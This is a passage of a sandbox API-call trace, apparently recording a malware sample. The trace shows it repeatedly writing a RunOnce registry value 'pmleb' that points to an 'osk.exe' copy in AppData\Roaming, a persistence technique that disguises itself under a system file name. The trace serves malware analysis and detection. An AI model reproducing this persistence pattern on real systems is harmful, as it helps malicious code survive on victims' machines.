Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.704] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.704] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.704] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.704] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.704] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x46 [0081.704] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.704] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x47 [0081.704] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.705] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x46 
[0081.705] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.705] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.705] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.705] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.705] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.705] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.705] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.705] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.705] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.706] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.706] RegCloseKey (hKey=0x280) returned 0x0 [0081.706] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.706] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.706] SetTimer (hWnd=0x20280, nIDEvent=0x20c2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c2 [0081.706] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.718] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.718] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.718] KillTimer (hWnd=0x20280, uIDEvent=0x20c2) returned 1 [0081.718] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.718] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.719] IUnknown:Release (This=0x787518) returned 0x1 [0081.719] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.719] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.719] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.719] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.719] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.719] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.719] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.719] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.719] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.719] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x47 [0081.719] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.719] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x48 [0081.719] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.720] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x47 [0081.720] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.720] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.721] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0081.721] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.721] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.721] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.721] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.721] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.722] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.722] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.722] RegCloseKey (hKey=0x280) returned 0x0 [0081.722] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.722] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.722] SetTimer (hWnd=0x20280, nIDEvent=0x20c3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c3 [0081.722] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.734] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.734] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.734] KillTimer (hWnd=0x20280, uIDEvent=0x20c3) returned 1 [0081.735] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.735] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.735] IUnknown:Release (This=0x787518) returned 0x1 [0081.735] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.735] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.735] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.735] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.735] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.735] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.735] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.735] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.735] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.736] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x48 [0081.736] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.736] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x49 [0081.736] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.736] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x48 [0081.737] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.737] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.737] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.737] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.737] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0081.737] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.737] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.737] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.737] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.737] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.738] RegCloseKey (hKey=0x280) returned 0x0 [0081.738] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.738] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.738] SetTimer (hWnd=0x20280, nIDEvent=0x20c4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c4 [0081.738] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.752] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.752] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.752] KillTimer (hWnd=0x20280, uIDEvent=0x20c4) returned 1 [0081.753] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.753] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.753] IUnknown:Release (This=0x787518) returned 0x1 [0081.753] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.753] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.753] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
